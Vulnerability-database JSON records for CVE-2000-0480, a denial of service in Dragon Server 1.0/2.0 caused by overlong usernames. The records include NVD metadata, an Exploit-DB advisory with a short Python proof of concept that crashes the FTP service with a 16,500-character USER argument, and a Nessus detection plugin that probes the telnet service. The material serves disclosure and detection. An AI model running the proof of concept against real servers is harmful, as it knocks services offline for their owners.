{"id": "CVE-2000-0480", "bulletinFamily": "NVD", "title": "CVE-2000-0480", "description": "Dragon telnet server allows remote attackers to cause a denial of service via a long username.", "published": "2000-06-16T04:00:00", "modified": "2016-10-18T02:07:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0480", "reporter": "cve@mitre.org", "references": ["http://www.securityfocus.com/bid/1352", "http://marc.info/?l=bugtraq&m=96113734714517&w=2"], "cvelist": ["CVE-2000-0480"], "type": "cve", "lastseen": "2019-05-29T18:07:37", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "ec4830f5548d05ffe375f0ea2c934359"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "93bd2bf4a85ad28f8605b7b4fc10f860"}, {"key": "cpe23", "hash": "a3d454a339304ec5418d274666eb27c4"}, {"key": "cvelist", "hash": "2c248c85f6ff7401ef8880e96c16080a"}, {"key": "cvss", "hash": "b5bbdd851ff7634dd01c09e00d03be1e"}, {"key": "cvss2", "hash": "e2b44d17a049a159a684c7e2b843b3fa"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "78a7a5cbaf09985c14389298e454e7db"}, {"key": "description", "hash": "9cbf959ae71b37b8186f3e5383c3e3ab"}, {"key": "href", "hash": "86eddb65f9225fd50a93bd43f1b6645c"}, {"key": "modified", "hash": "b454301219666c789ef4fbb1b995c531"}, {"key": "published", "hash": "6b614f9f0e9557f5b2be88642ef32934"}, {"key": "references", "hash": "a52de3a8282131c20c4d0e356b6dc8e1"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "a15fb93472b0122c09ffe3199d74d76a"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "50ee57979f1f9cdf4d08044abc503fdee661744cf4372c07b3efa8b822392360", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["DRAGON_TELNET.NASL"]}, {"type": "osvdb", "idList": ["OSVDB:350"]}, {"type": "exploitdb", "idList": ["EDB-ID:20016"]}], "modified": "2019-05-29T18:07:37"}, "score": {"value": 5.1, "vector": "NONE", "modified": "2019-05-29T18:07:37"}, "vulnersScore": 5.1}, "objectVersion": "1.3", "cpe": ["cpe:/a:shadow_op_software:dragon_server:1.0", "cpe:/a:shadow_op_software:dragon_server:2.0"], "affectedSoftware": [{"name": "shadow_op_software dragon_server", "operator": "eq", "version": "1.0"}, {"name": "shadow_op_software dragon_server", "operator": "eq", "version": "2.0"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:shadow_op_software:dragon_server:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:shadow_op_software:dragon_server:2.0:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"]}

{"exploitdb": [{"lastseen": "2016-02-02T13:17:15", "bulletinFamily": "exploit", "description": "Shadow Op Software Dragon Server 1.0/2.0 Multiple DoS. CVE-2000-0480. Dos exploit for windows platform", "modified": "2000-06-16T00:00:00", "published": "2000-06-16T00:00:00", "id": "EDB-ID:20016", "href": "https://www.exploit-db.com/exploits/20016/", "type": "exploitdb", "title": "Shadow Op Software Dragon Server 1.0/2.0 - Multiple DoS", "sourceData": "source: http://www.securityfocus.com/bid/1352/info\r\n\r\nTwo denial of service vulnerabilities exist in the Dragon Server package, versions 1.00 and 2.00, from Shadow Ops Software. By supplying large arguments to two different network services, it is possible to cause these services to be innaccessible.\r\n\r\nBy sending a USER command to the ftp server, and placing a buffer of approximately 16,500 characters as the argument to the command, it is possible to crash the ftp service.\r\n\r\nBy sending a buffer of approximately 16,500 characters to the telnet server in place of a user name, it is also possible to crash this service.\r\n\r\nThese both appear to be due to insufficient bounds checking. \r\n\r\n#!/usr/bin/python \r\n# \r\n# Dragon Server(ftp) DoS Proof of Concept Code. \r\n# Vulnerability Discovered by USSR Labs(http://www.ussrback.com) \r\n# Simple Script by Prizm(Prizm@Resentment.org) \r\n# \r\n# By connecting to port 21(ftp) on a system running Dragon FTP Server \r\nv1.00/2.00 and typing \r\n# USER (16500 bytes) the service will crash \r\n# \r\n# This *simple* little script will cause Dragon Server's ftp service \r\nto crash. \r\n \r\nfrom ftplib import FTP \r\n \r\nftp = FTP('xxx.xxx.xxx.xxx') # Replace x's with ip \r\nftp.login('A' * 16500) \r\nftp.quit() \r\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/20016/"}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 4691\n[CVE-2000-0480](https://vulners.com/cve/CVE-2000-0480)\nBugtraq ID: 1352\n", "modified": "2000-06-16T00:00:00", "published": "2000-06-16T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:350", "id": "OSVDB:350", "type": "osvdb", "title": "Dragon Telnet Server Username Remote Overflow", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "nessus": [{"lastseen": "2019-02-21T01:07:40", "bulletinFamily": "scanner", "description": "It was possible to shut down the remote telnet server by issuing a far too long login name (over 16,000 chars)\n\nThis problem allows an attacker to prevent remote administration of this host.", "modified": "2018-07-10T00:00:00", "id": "DRAGON_TELNET.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=10451", "published": "2000-06-27T00:00:00", "title": "Dragon Telnet Server Login Name Handling Remote Overflow DoS", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(10451);\n script_version(\"1.27\");\n script_cvs_date(\"Date: 2018/07/10 14:27:33\");\n\n script_cve_id(\"CVE-2000-0480\");\n script_bugtraq_id(1352);\n\n script_name(english:\"Dragon Telnet Server Login Name Handling Remote Overflow DoS\");\n script_summary(english:\"Attempts a USER buffer overflows\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote server is vulnerable to a denial of service.\");\n script_set_attribute(attribute:\"description\", value:\n\"It was possible to shut down the remote telnet server by issuing a far\ntoo long login name (over 16,000 chars)\n\nThis problem allows an attacker to prevent remote administration of\nthis host.\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to the latest version your telnet server.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2000/06/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2000/06/27\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_DENIAL);\n script_copyright(english:\"This script is Copyright (C) 2000-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Windows\");\n\n script_dependencie(\"find_service1.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/telnet\", 23);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude('global_settings.inc');\ninclude('telnet_func.inc');\n\nport = get_kb_item(\"Services/telnet\");\nif(!port)port = 23;\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nif(!get_port_state(port))exit(0);\n\nsoc = open_sock_tcp(port);\nif(soc)\n{\n r = telnet_negotiate(socket:soc);\n r2 = recv(socket:soc, length:4096);\n r = r + r2;\n if(r)\n {\n req = string(crap(18000), \"\\r\\n\");\n send(socket:soc, data:req);\n close(soc);\n sleep(1);\n\n soc2 = open_sock_tcp(port);\n if(!soc2)security_warning(port);\n else {\n \tr = telnet_negotiate(socket:soc2);\n\tr2 = recv(socket:soc2, length:4096);\n\tr = r + r2;\n \tclose(soc2);\n\tif(!r)security_warning(port);\n }\n }\n}\n\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}]}